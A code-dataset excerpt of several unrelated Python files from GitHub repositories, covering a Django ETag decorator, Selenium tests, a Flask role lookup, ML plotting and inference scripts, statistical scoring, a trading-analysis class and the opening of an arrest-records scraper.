logging\nfrom functools import wraps\n\nfrom django.utils.decorators import available_attrs\nfrom django.utils.http import parse_etags, quote_etag\n\nfrom rest_framework import status\nfrom rest_framework.permissions import SAFE_METHODS\nfrom rest_framework.response import Response\n\nfrom rest_framework_extensions.utils import prepare_header_name\nfrom rest_framework_extensions.settings import extensions_api_settings\nfrom django.utils import six\n\n\nlogger = logging.getLogger('django.request')\n\n\nclass ETAGProcessor(object):\n \"\"\"Based on https://github.com/django/django/blob/master/django/views/decorators/http.py\"\"\"\n def __init__(self, etag_func=None, rebuild_after_method_evaluation=False):\n if not etag_func:\n etag_func = extensions_api_settings.DEFAULT_ETAG_FUNC\n self.etag_func = etag_func\n self.rebuild_after_method_evaluation = rebuild_after_method_evaluation\n\n def __call__(self, func):\n this = self\n @wraps(func, assigned=available_attrs(func))\n def inner(self, request, *args, **kwargs):\n return this.process_conditional_request(\n view_instance=self,\n view_method=func,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n return inner\n\n def process_conditional_request(self,\n view_instance,\n view_method,\n request,\n args,\n kwargs):\n etags, if_none_match, if_match = self.get_etags_and_matchers(request)\n res_etag = self.calculate_etag(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n if self.is_if_none_match_failed(res_etag, etags, if_none_match):\n if request.method in SAFE_METHODS:\n response = Response(status=status.HTTP_304_NOT_MODIFIED)\n else:\n response = self._get_and_log_precondition_failed_response(request=request)\n elif self.is_if_match_failed(res_etag, etags, if_match):\n response = self._get_and_log_precondition_failed_response(request=request)\n else:\n response = view_method(view_instance, request, *args, **kwargs)\n if self.rebuild_after_method_evaluation:\n res_etag = self.calculate_etag(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n if res_etag and not response.has_header('ETag'):\n response['ETag'] = quote_etag(res_etag)\n\n return response\n\n def get_etags_and_matchers(self, request):\n etags = None\n if_none_match = request.META.get(prepare_header_name(\"if-none-match\"))\n if_match = request.META.get(prepare_header_name(\"if-match\"))\n if if_none_match or if_match:\n # There can be more than one ETag in the request, so we\n # consider the list of values.\n try:\n etags = parse_etags(if_none_match or if_match)\n except ValueError:\n # In case of invalid etag ignore all ETag headers.\n # Apparently Opera sends invalidly quoted headers at times\n # (we should be returning a 400 response, but that's a\n # little extreme) -- this is Django bug #10681.\n if_none_match = None\n if_match = None\n return etags, if_none_match, if_match\n\n def calculate_etag(self,\n view_instance,\n view_method,\n request,\n args,\n kwargs):\n if isinstance(self.etag_func, six.string_types):\n etag_func = getattr(view_instance, self.etag_func)\n else:\n etag_func = self.etag_func\n return etag_func(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n def is_if_none_match_failed(self, res_etag, etags, if_none_match):\n if res_etag and if_none_match:\n return res_etag in etags or '*' in etags\n else:\n return False\n\n def is_if_match_failed(self, res_etag, etags, if_match):\n if res_etag and if_match:\n return res_etag not in etags and '*' not in etags\n else:\n return False\n\n def _get_and_log_precondition_failed_response(self, request):\n logger.warning('Precondition Failed: %s', request.path,\n extra={\n 'status_code': status.HTTP_200_OK,\n 'request': request\n }\n )\n return Response(status=status.HTTP_412_PRECONDITION_FAILED)\n\n\netag = ETAGProcessor","repo_name":"snowman-st/edu-back","sub_path":"lib/python3.5/site-packages/rest_framework_extensions/etag/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26013220256","text":"from selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.expected_conditions import element_to_be_clickable\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_add_delete(_url_provider, _driver, _wait):\n test_item = 'add_remove'\n test_url = _url_provider.get_test_url(test_item)\n _driver.get(test_url)\n \n add_elem_path = '//*[@id=\"content\"]/div/button'\n add_button = _driver.find_element_by_xpath(add_elem_path)\n\n for i in range(3):\n add_button.click()\n \n del_elem_path = '//*[@id=\"elements\"]/button[3]'\n delete_button = _wait.until(element_to_be_clickable((By.XPATH, del_elem_path)))\n is_element_present = delete_button.is_displayed()\n\n if is_element_present:\n for i in range(3):\n del_elem_path = f'//*[@id=\"elements\"]/button[{3-i}]'\n delete_button = _driver.find_element_by_xpath(del_elem_path)\n delete_button.click()\n \n del_elem_path = '//*[@id=\"elements\"]/button[1]'\n \n try:\n _driver.find_element_by_xpath(del_elem_path)\n isDeleted = False\n except Exception:\n isDeleted = True\n\n assert test_url == 'http://the-internet.herokuapp.com/add_remove_elements/'\n assert _driver.current_url == test_url\n assert is_element_present == True\n assert isDeleted == True\n\n _driver.quit()\n\ndef test_checkboxes(_url_provider, _driver, _wait):\n test_item = 'checkboxes'\n test_url = _url_provider.get_test_url(test_item)\n _driver.get(test_url)\n\n checkbox_1_locator = '//*[@id=\"checkboxes\"]/input[1]'\n checkbox_2_locator = '//*[@id=\"checkboxes\"]/input[2]'\n \n checkbox_1 = _wait.until(EC.presence_of_element_located((By.XPATH, checkbox_1_locator)))\n checkbox_1.click()\n\n checkbox_2 = _wait.until(EC.presence_of_element_located((By.XPATH, checkbox_2_locator)))\n checkbox_2.click()\n res_1 = checkbox_1.is_selected()\n res_2 = checkbox_2.is_selected()\n\n assert res_1 == True\n assert res_2 == False\n\n","repo_name":"ArtDemid/InfopulseUniversity","sub_path":"hometasks/selenium_webdriver_hometask/test_pytest_selesnium_base.py","file_name":"test_pytest_selesnium_base.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7715364290","text":"from ..model.create_database import User\nfrom ..model.create_database import Admin\nfrom flask import make_response\nfrom ..connect_to_aws import database\n\n\n\ndef return_role_by_email_method(email):\n output_message = {\n \"message\": \"Information waiting for confirmation\"\n }\n user = User.query.filter_by(user_email=email).first()\n admin = Admin.query.filter_by(admin_email=email).first()\n if user:\n status_code = 200\n output_message['message'] = \"this email owner is a user\"\n elif admin:\n status_code = 200\n output_message['message'] = 'this email owner is an admin'\n else:\n status_code = 400\n output_message['message'] = \"this is not our system's email\"\n output_json = make_response(output_message)\n output_json.status_code = status_code\n output_json.message = output_message['message']\n database.session.close()\n return output_json\n","repo_name":"COMP5703-CS57-3/Online-Gift-Shop","sub_path":"backend/main/service/return_role_by_email.py","file_name":"return_role_by_email.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13779369426","text":"import os\nimport sys\ncode_dir = '/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project/ben-rhodes-masters-project/proposal/code'\ncode_dir_2 = '/home/ben/ben-rhodes-masters-project/proposal/code'\ncode_dir_3 = '/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project/ben-rhodes-masters-project/proposal/code/neural_network'\ncode_dirs = [code_dir, code_dir_2, code_dir_3]\nfor code_dir in code_dirs:\n if code_dir not in sys.path:\n sys.path.append(code_dir)\n\nimport numpy as np\nimport os\nimport pickle\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import rc\nfrom numpy import random as rnd\nfrom scipy.integrate import dblquad\nfrom scipy.optimize import minimize\nfrom scipy.stats import norm, multivariate_normal\nfrom sklearn.neighbors import KernelDensity as kd\n\nfrom plot import save_fig\n\nrc('lines', linewidth=0.5)\nrc('font', size=8)\nrc('legend', fontsize=10)\nrc('text', usetex=True)\n\n\ndef joint_distribution(model, z1, z2, x):\n \"\"\"\n param z1: float or array (n, 1)\n param z1: float or array (n, 1)\n param x: array (2, ) or (n, 2)\n \"\"\"\n z = np.array([z1, z2])\n z = z.reshape(1, 1, 2)\n x = x.reshape(1, 2)\n return model(x, z)\n\n\ndef compute_true_landmark_marginals(model, x_landmarks):\n p_x = np.zeros(len(x_landmarks))\n integral_limit = 10\n\n for i, x_i in enumerate(x_landmarks):\n res = dblquad(lambda z1, z2: joint_distribution(model, z1, z2, x_i), -integral_limit, integral_limit,\n lambda z1: -integral_limit, lambda z2: integral_limit)\n p_x[i] = res[0]\n \n return p_x\n\n\ndef plot_contours(ax, f, lim, num_contours, levels=None):\n delta = 0.05\n x = np.arange(-lim, lim, delta)\n y = np.arange(-lim, lim, delta)\n X, Y = np.meshgrid(x, y)\n mesh = np.vstack([X.flatten(), Y.flatten()]).T\n Z = f(mesh).reshape(X.shape)\n if levels:\n ax.contour(X, Y, Z, num_contours, colors='black', alpha=0.7, levels=levels, linewidths=1)\n else:\n ax.contour(X, Y, Z, num_contours, colors='black', alpha=0.3)\n\n\ndef plot_prior(ax, z):\n ax.set_title(r'$P(z): \\mathcal{N}(0, \\textbf{I})$', fontsize=10)\n sns.regplot(x=z[:, 0], y=z[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n plot_contours(ax, lambda x: multivariate_normal.pdf(x, np.zeros(2), np.identity(2)), 10, 10)\n\n\ndef plot_p_x(ax, x, x_landmarks):\n # ax.set_title(r'$P(x): \\mathcal{N}(\\textbf{w}, c \\textbf{I})$', fontsize=8)\n ax.set_title(r'$P(x)$', fontsize=10)\n sns.regplot(x=x[:, 0], y=x[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n landmark_cols = ['red', 'green', 'blue']\n # landmark_cols = ['red', 'orange', 'green', 'blue', 'purple']\n for i, x_i in enumerate(x_landmarks):\n ax.scatter(x_i[0], x_i[1], color=landmark_cols[i], s=35, edgecolors='k')\n\n\ndef plot_noise(ax, noise, sample_size, noise_num):\n if noise_num == 1:\n ax.set_title(r'$P_y^1(Y): \\mathcal{N}(\\bar{\\textbf{x}}, \\bar{\\Sigma})$', fontsize=10)\n if noise_num == 2:\n ax.set_title(r'$P_y^2(Y): \\mathcal{N}(0, 30 \\textbf{I})$', fontsize=10)\n y = noise.sample(sample_size)\n sns.regplot(x=y[:, 0], y=y[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n plot_contours(ax, lambda x: noise(x), 10, 10)\n\n\ndef plot_marginals(x, z, x_landmarks, noise, bad_noise, sample_size, title, save_dir):\n fig, axs = plt.subplots(2, 2, figsize=(3.25, 3.25), sharex=True, sharey=True)\n axs = axs.ravel()\n plot_prior(axs[0], z)\n plot_p_x(axs[1], x, x_landmarks)\n plot_noise(axs[2], noise, sample_size, 1)\n plot_noise(axs[3], bad_noise, sample_size, 2)\n\n for ax in axs:\n ax.set_xlim(-7, 7)\n ax.set_ylim(-7, 7)\n fig.tight_layout()\n save_fig(fig, save_dir + 'figs/', title)\n\n\ndef plot_true_posterior(ax, model, z1_mesh, z2_mesh, x, p_x, cmap):\n mesh = np.vstack([z1_mesh.flatten(), z2_mesh.flatten()]).T # (gridsize, 2)\n p_mesh = model(x, mesh) / p_x\n p_mesh = p_mesh.reshape(z1_mesh.shape)\n # ax.pcolormesh(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n ax.contourf(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n\n\ndef plot_approx_posterior(ax, z1_mesh, z2_mesh, x, p_x, cmap, posterior, model):\n mesh = np.vstack([z1_mesh.flatten(), z2_mesh.flatten()]).T\n p_mesh = posterior(mesh, x)\n p_mesh = p_mesh.reshape(z1_mesh.shape)\n # ax.pcolormesh(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n ax.contourf(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n plot_contours(ax, lambda z: model(x, z) / p_x, 5, 1, levels=[0.05])\n\n\ndef plot_landmark_posteriors(x_landmarks,\n p_x, model,\n free_energy_posterior,\n vnce_posterior,\n bad_vnce_posterior,\n bad_vnce_posterior_nu50,\n title,\n save_dir):\n nbins = 300\n axis_lim = 5\n z1_mesh, z2_mesh = np.mgrid[-axis_lim:axis_lim:nbins*1j, -axis_lim:axis_lim:nbins*1j]\n # cmaps = [plt.cm.YlOrRd, plt.cm.YlGn, plt.cm.GnBu]\n cmaps = [plt.cm.YlOrRd_r, plt.cm.YlGn_r, plt.cm.GnBu_r]\n # cmaps = [plt.cm.YlOrRd_r, plt.cm.Oranges_r, plt.cm.YlGn_r, plt.cm.Blues_r, plt.cm.Purples_r]\n\n sns.set_style('darkgrid')\n sns.set_palette(sns.color_palette(\"pastel\"))\n num_rows, num_cols = 5, 3\n fig, axs = plt.subplots(num_rows, num_cols, figsize=(3.25, 5.4))\n\n for j in range(num_cols):\n plot_true_posterior(axs[0, j], model, z1_mesh, z2_mesh, x_landmarks[j], p_x[j], cmaps[j])\n plot_approx_posterior(axs[1, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], free_energy_posterior, model)\n plot_approx_posterior(axs[2, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], vnce_posterior, model)\n plot_approx_posterior(axs[3, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], bad_vnce_posterior, model)\n plot_approx_posterior(axs[4, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], bad_vnce_posterior_nu50, model)\n\n # remove space between subplots and add row labels\n for ax in axs.ravel():\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.set_aspect('equal')\n\n # add label to each row\n rows = ['True', 'KL', 'Noise 1\\n' + r'$\\nu=1$', 'Noise 2\\n' + r'$\\nu=1$', 'Noise 2\\n' + r'$\\nu=10$']\n pad = 5 # in points\n for ax, row in zip(axs[:, 0], rows):\n ax.annotate(row, xy=(0, 0.5), xytext=(-ax.yaxis.labelpad - pad, 0), xycoords=ax.yaxis.label,\n textcoords='offset points', size='large', ha='right', va='center')\n\n fig.subplots_adjust(left=0.15, wspace=0, hspace=0.1)\n save_fig(fig, save_dir + 'figs/', title)\n\n\ndef model_to_noise_frac(x, z, pos, model, noise, nu):\n joint_noise = nu * pos(z, x) * noise(x)\n model_val = model(x, z)\n return joint_noise / (joint_noise + model_val)\n\n\ndef print_landmark_prob_of_noise_class(model, noise, bad_noise, vnce_pos, bad_vnce_pos, bad_vnce_pos_nu50, x_landmarks):\n landmarks = np.array(x_landmarks)\n good_z_landmarks = vnce_pos.sample(1, landmarks)\n bad_z_landmarks = bad_vnce_pos.sample(1, landmarks)\n bad50_z_landmarks = bad_vnce_pos_nu50.sample(1, landmarks)\n print(model_to_noise_frac(landmarks, good_z_landmarks, vnce_pos, model, noise, 1))\n print(model_to_noise_frac(landmarks, bad_z_landmarks, bad_vnce_pos, model, bad_noise, 1))\n print(model_to_noise_frac(landmarks, bad50_z_landmarks, bad_vnce_pos_nu50, model, bad_noise, 50))\n\n\ndef main():\n load_dir = '/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project-non-code/experiments/stars-and-moons/'\n save_dir = load_dir\n\n model = pickle.load(open(os.path.join(load_dir, 'truncate=False_model.p'), 'rb'))\n # model_trunc = pickle.load(open(os.path.join(save_dir, 'truncate=True_model.p'), 'rb'))\n\n fe_pos = pickle.load(open(os.path.join(load_dir, 'FreeEnergyLoss_truncate_gaussian=False_good_noise_nu1_var_dist.p'), 'rb'))\n vnce_pos = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_good_noise_nu1_var_dist.p'), 'rb'))\n bad_vnce_pos = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_bad_noise_nu1_var_dist.p'), 'rb'))\n bad_vnce_pos_nu10 = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_bad_noise_nu10_var_dist.p'), 'rb'))\n\n # fe_pos_trunc = pickle.load(open(os.path.join(save_dir, 'FreeEnergyLoss_truncate_gaussian=True_good_noise_nu1_var_dist.p'), 'rb'))\n # vnce_pos_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_good_noise_nu1_var_dist.p'), 'rb'))\n # bad_vnce_pos_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_bad_noise_nu1_var_dist.p'), 'rb'))\n # bad_vnce_pos_nu50_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_bad_noise_nu50_var_dist.p'), 'rb'))\n\n noise = pickle.load(open(os.path.join(load_dir, 'good_noise.p'), 'rb'))\n bad_noise = pickle.load(open(os.path.join(load_dir, 'bad_noise.p'), 'rb'))\n\n sample_size = 500\n Z, X = model.sample(sample_size)\n # Z_trunc, X_trunc = model_trunc.sample(sample_size)\n\n x_landmarks = [np.array([-5, -5]), np.array([0, 0]), np.array([5, 5])]\n # x_landmarks_trunc = [np.array([-2, -2]), np.array([0, 0]), np.array([2, 2])]\n\n plot_marginals(X, Z, x_landmarks, noise, bad_noise, sample_size, title='marginals-for-gaussian-model', save_dir=save_dir)\n # plot_marginals(X_trunc, Z_trunc, x_landmarks_trunc, noise, bad_noise, sample_size, title='marginals-for-truncated-gaussian-model', save_dir=save_dir)\n\n p_x = compute_true_landmark_marginals(model, x_landmarks)\n # p_x_trunc = compute_true_landmark_marginals(model_trunc, x_landmarks_trunc)\n\n plot_landmark_posteriors(x_landmarks,\n p_x,\n model,\n fe_pos,\n vnce_pos,\n bad_vnce_pos,\n bad_vnce_pos_nu10,\n title='landmark-posteriors-gaussian-model',\n save_dir=save_dir)\n # plot_landmark_posteriors(x_landmarks_trunc,\n # p_x_trunc,\n # model_trunc,\n # fe_pos_trunc,\n # vnce_pos_trunc,\n # bad_vnce_pos_trunc,\n # bad_vnce_pos_nu50_trunc,\n # title='landmark-posteriors-truncated-gaussian-model',\n # save_dir=save_dir)\n\n print_landmark_prob_of_noise_class(model, noise, bad_noise, vnce_pos, bad_vnce_pos, bad_vnce_pos_nu10, x_landmarks)\n # print_landmark_prob_of_noise_class(model_trunc, noise, bad_noise, vnce_pos_trunc, bad_vnce_pos_trunc, bad_vnce_pos_nu50_trunc, x_landmarks_trunc)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"benrhodes26/VNCE","sub_path":"proposal/code/scripts/stars_and_moons/posterior visualisations.py","file_name":"posterior visualisations.py","file_ext":"py","file_size_in_byte":11048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32349913446","text":"__author__ = 'TimeWz667'\n__all__ = ['name_generator', 'NameGenerator']\n\n\ndef name_generator(prefix, start, by):\n i = int(start)\n by = int(by) if by >= 1 else by\n\n while True:\n yield '{}{}'.format(prefix, i)\n i += by\n\n\nclass NameGenerator:\n def __init__(self, prefix, start=0, by=1):\n self.Prefix = prefix\n self.Start = start\n self.By = by\n self.Index = int(start)\n\n def reset(self):\n self.Index = int(self.Start)\n\n def get_next(self):\n i, self.Index = self.Index, self.Index + self.By\n return '{}{}'.format(self.Prefix, i)\n\n def to_json(self):\n return {\n 'Prefix': self.Prefix,\n 'Start': self.Start,\n 'By': self.By\n }\n\n @staticmethod\n def from_json(js):\n return NameGenerator(js['Prefix'], js['Start'], js['By'])\n\n\nif __name__ == '__main__':\n ng = NameGenerator('Ag', 1, 1)\n print(ng.get_next())\n print(ng.get_next())\n","repo_name":"CxModelling/PyComplexism","sub_path":"complexism/misc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36969805451","text":"import tensorflow as tf\r\nimport config\r\nfrom tqdm import tqdm\r\n\r\n\r\n\r\ndef get_target(self,data):\r\n text=data[\"text\"]\r\n text_id=data[\"TEXTID\"]\r\n sentiment=data[\"sentiment\"]\r\n \r\n encoded_text=config.TOKENIZER.encode(text)\r\n ids=encoded_text.ids\r\n type_ids=encoded_text.type_ids\r\n attention=encoded_text.attention_mask\r\n \r\n if(len(ids)>config.MAX_LEN):\r\n ids=ids[:config.MAX_LEN-5]\r\n type_ids=type_ids[:config.MAX_LEN-5]\r\n attention=attention[:config.MAX_LEN-5]\r\n \r\n pad=config.MAX_LEN-len(ids)\r\n\r\n ids=ids+[0]*pad\r\n type_ids=type_ids+[0]*pad\r\n attention=attention+[0]*pad\r\n\r\n return {\"orig\":text,\"id\":text_id,\"input_ids\":ids,\"token_type_ids\":type_ids,\"attention_mask\":attention}\r\n\r\n\r\ndef gen(data):\r\n \"\"\"(inputs, targets)\"\"\"\r\n for i in range(len(data)):\r\n yield get_target(data.iloc[i])\r\n\r\ndef get_text(text,pred):\r\n \r\n pred_texts=[]\r\n orig_texts=[]\r\n text=text.numpy()\r\n pred=tf.argmax(pred,axis=1).numpy()\r\n\r\n for t,p in zip(text,pred):\r\n orig_texts.append(t.decode(\"utf-8\"))\r\n t=config.TOKENIZER.encode(orig_texts[-1]).offsets\r\n i,j=p[0],p[1]\r\n pred_texts.append(orig_texts[-1][t[i][0]:t[j][1]])\r\n \r\n return pred_texts\r\n\r\ndef run():\r\n test_data=pd.read_csv(config.TESTING_FILE)\r\n test_dataset=tf.data.Dataset.from_generator(gen(test_data),\r\n output_types={\"orig\":tf.string,\"id\":tf.string,\"input_ids\":tf.int32,\r\n \"token_type_ids\":tf.int32,\"attention_mask\":tf.int32}\r\n ).batch(config.VALID_BATCH_SIZE)\r\n\r\n model=tf.keras.models.load_model(config.MODEL_PATH)\r\n\r\n output_texts=[]\r\n for data in tqdm(test_dataset):\r\n orig_text=data[\"orig\"]\r\n preds=model.predict(data)\r\n output_texts=output_texts+get_text(orig_text,preds)\r\n \r\n sample = pd.read_csv(\"kaggle/input/tweet-sentiment-extraction/sample_submission.csv\")\r\n sample.loc[:, 'selected_text'] = output_texts\r\n sample.to_csv(\"submission.csv\", index=False)\r\n\r\nif __name__==\"__main__\":\r\n run()\r\n","repo_name":"Jask-AI/BERT_SETUP_TF","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40764967738","text":"from itertools import combinations\nimport pandas as pd\n\n\nclass MoaCalculator:\n def __init__(self, label_series: pd.Series, versus_series: pd.Series):\n self.label_series = label_series\n self.versus_series = versus_series\n\n def calculate(self):\n \"\"\"Calculates the MOA score\"\"\"\n label_mean = self.label_series.mean()\n versus_mean = self.versus_series.mean()\n cat = pd.concat([self.label_series, self.versus_series])\n std = cat.std()\n score = abs(label_mean - versus_mean) / std\n return score\n\n\nclass MoaTable:\n def __init__(self, data: dict):\n self.table = pd.DataFrame(data)\n\n def rank(self):\n self.table[\"rank\"] = self.table.groupby([\"label\", \"versus\"])[\"score\"].rank(\n ascending=False\n )\n return self\n\n\nclass MoaScores:\n def __init__(self, table):\n self.table = self._sort_data_frame(table, [\"rank\", \"label\", \"versus\"])\n\n @staticmethod\n def _sort_data_frame(df: pd.DataFrame, col: list[str]):\n return df.sort_values(by=col, ascending=True).reset_index(drop=True)\n\n def get_by_rank(self, rank: int):\n return self.table[self.table[\"rank\"] == rank]\n\n def get_by_ranks(self, lower: int, upper: int) -> pd.DataFrame:\n \"\"\"returns the table by rank range\"\"\"\n return self.table[(self.table[\"rank\"] >= lower) & (self.table[\"rank\"] <= upper)]\n\n def to_csv(self, path: str) -> None:\n self.table.to_csv(path, index=False)\n return None\n\n\nclass MoaScoreGenerator:\n def __init__(self, sampled_data: pd.DataFrame, label_col: str):\n self.sampled_data = sampled_data\n self.label_col = label_col\n self._cols_2_skip = [\"system:index\", \"isTraining\", \".geo\", self.label_col]\n\n @property\n def cols_2_skip(self):\n return self._cols_2_skip\n\n def add_cols_2_skip(self, cols: list[str]):\n self._cols_2_skip.extend(cols)\n return None\n\n def generate_scores(self) -> MoaScores:\n labels = self.sampled_data[self.label_col].unique().tolist()\n combos = combinations(labels, 2)\n\n moa_tables = []\n\n for combo in combos:\n dfc = self.sampled_data.copy()\n dfc = dfc[\n (dfc[self.label_col] == combo[0]) | (dfc[self.label_col] == combo[1])\n ]\n table_data = {\"label\": [], \"versus\": [], \"predictor\": [], \"score\": []}\n for col in dfc.columns:\n if col in self.cols_2_skip:\n continue\n dfc1 = dfc[dfc[self.label_col] == combo[0]][col]\n dfc2 = dfc[dfc[self.label_col] == combo[1]][col]\n\n moa = MoaCalculator(dfc1, dfc2)\n\n table_data[\"label\"].append(combo[0])\n table_data[\"versus\"].append(combo[1])\n table_data[\"predictor\"].append(col)\n table_data[\"score\"].append(moa.calculate())\n\n moa_table = MoaTable(table_data)\n moa_table.rank()\n moa_tables.append(moa_table.table)\n\n return MoaScores(pd.concat(moa_tables))\n","repo_name":"Wetlands-NWRC/earth-engine-scripts","sub_path":"ee-measure-of-assocation/moa/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3149073054","text":"class Analysis():\n \n def __init__(self, asset_df, date):\n self.asset_df = asset_df\n self.date = date\n self.twentyfive_days = {}\n self.fifty_days = {}\n self.hundred_days = {}\n \n def get_position(self, date):\n # Get index location of date\n position = -1\n for day in self.asset_df.index:\n position += 1\n if date in str(day):\n break\n return position\n \n def recent_ma_hist(self, days=60):\n # Check the ratio of days the closing price has stayed above each moving average\n total_days = 0\n date_position = self.get_position(self.date)\n ma_status = {'MA': 0, 'MA.1': 0, '10': 0, '50': 0, '200': 0}\n for cal_date in pd.date_range(self.asset_df.index[date_position - days], self.asset_df.index[date_position]):\n total_days += 1 \n for mov_avg in ['MA', 'MA.1', '10', '50', '200']:\n if self.asset_df.loc[cal_date]['close'] > self.asset_df.loc[cal_date][mov_avg]:\n ma_status[mov_avg] += 1\n \n for avg in ma_status.keys():\n ma_status[avg] = ma_status[avg] / total_days\n \n return ma_status\n \n def price_trends(self):\n date_position = self.get_position(self.date)\n \n # Previous hundred days data\n hundred = {}\n for date in pd.date_range(self.asset_df.index[date_position - 100], self.asset_df.index[date_position]):\n hundred['low'].append((self.asset_df.loc[str(date).split(' ')[0]]['low']))\n hundred['high'].append((self.asset_df.loc[str(date).split(' ')[0]]['high']))\n hundred['open'].append((self.asset_df.loc[str(date).split(' ')[0]]['open']))\n hundred['close'].append((self.asset_df.loc[str(date).split(' ')[0]]['close']))\n hundred['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - (self.asset_df.loc[str(date).split(' ')[0]]['open']))\n # Previous fifty days data\n fifty = {}\n for date in pd.date_range(self.asset_df.index[date_position - 50], self.asset_df.index[date_position]):\n fifty['low'].append(self.asset_df.loc[str(date).split(' ')[0]]['low'])\n fifty['high'].append(self.asset_df.loc[str(date).split(' ')[0]]['high'])\n fifty['open'].append(self.asset_df.loc[str(date).split(' ')[0]]['open'])\n fifty['close'].append(self.asset_df.loc[str(date).split(' ')[0]]['close'])\n fifty['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - (self.asset_df.loc[str(date).split(' ')[0]]['open']))\n # Previous twenty five days data \n twenty_five = {}\n for date in pd.date_range(self.asset_df.index[date_position - 25], self.asset_df.index[date_position]):\n twenty_five['low'].append(self.asset_df.loc[str(date).split(' ')[0]]['low'])\n twenty_five['high'].append(self.asset_df.loc[str(date).split(' ')[0]]['high'])\n twenty_five['open'].append(self.asset_df.loc[str(date).split(' ')[0]]['open'])\n twenty_five['close'].append(self.asset_df.loc[str(date).split(' ')[0]]['close'])\n twenty_five['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - (self.asset_df.loc[str(date).split(' ')[0]]['open']))\n \n # Add data to the dictionary for twenty five day analysis\n self.twentyfive_days['avg daily change'] = np.mean(twenty_five['daily change'])\n self.twentyfive_days['std_dev'] = np.std(twenty_five['close'])\n self.twentyfive_days['long term ma'] = self.recent_ma_hist(days=25)['200']\n self.twentyfive_days['med term ma'] = self.recent_ma_hist(days=25)['50']\n self.twentyfive_days['short term ma'] = self.recent_ma_hist(days=25)['MA']\n \n # Add data to the dictionary for fifty day analysis\n self.fifty_days['avg daily change'] = np.mean(fifty['daily change'])\n self.fifty_days['std dev'] = np.std(fifty['close'])\n self.fifty_days['long term ma'] = self.recent_ma_hist(days=50)['200']\n self.fifty_days['med term ma'] = self.recent_ma_hist(days=50)['50']\n self.fifty_days['short term ma'] = self.recent_ma_hist(days=50)['MA']\n \n # Add data to the dictionary for one hundred day analysis\n self.hundred_days['avg daily change'] = np.mean(hundred['daily change'])\n self.hundred_days['std dev'] = np.std(hundred['close'])\n self.hundred_days['long term ma'] = self.recent_ma_hist(days=100)['200']\n self.hundred_days['med term ma'] = self.recent_ma_hist(days=100)['50']\n self.hundred_days['short term ma'] = self.recent_ma_hist(days=100)['MA']\n \n return self\n","repo_name":"ralphjstuder/btc_trading","sub_path":"Asset Analysis/tech_analysis.py","file_name":"tech_analysis.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26364292229","text":"'''\r\nScript Name: pcso.py\r\nVersion: 1\r\nRevised Date: 03/23/2017\r\nPython Version: 3\r\nDescription: Downloads all the arrests from 1990-2017 from Polk County Sheriffs Office\r\nCopyright: 2017 Mike Felch \r\nURL: http://www.forensicpy.com/\r\n--\r\n- ChangeLog -\r\nv1 - [03-23-2017]: Original code\r\n'''\r\n\r\nfrom core.booking_entry import BookingEntry\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import date, timedelta as td, datetime\r\nfrom threading import Thread\r\nimport requests, re, queue\r\n\r\nSEARCH_URL = 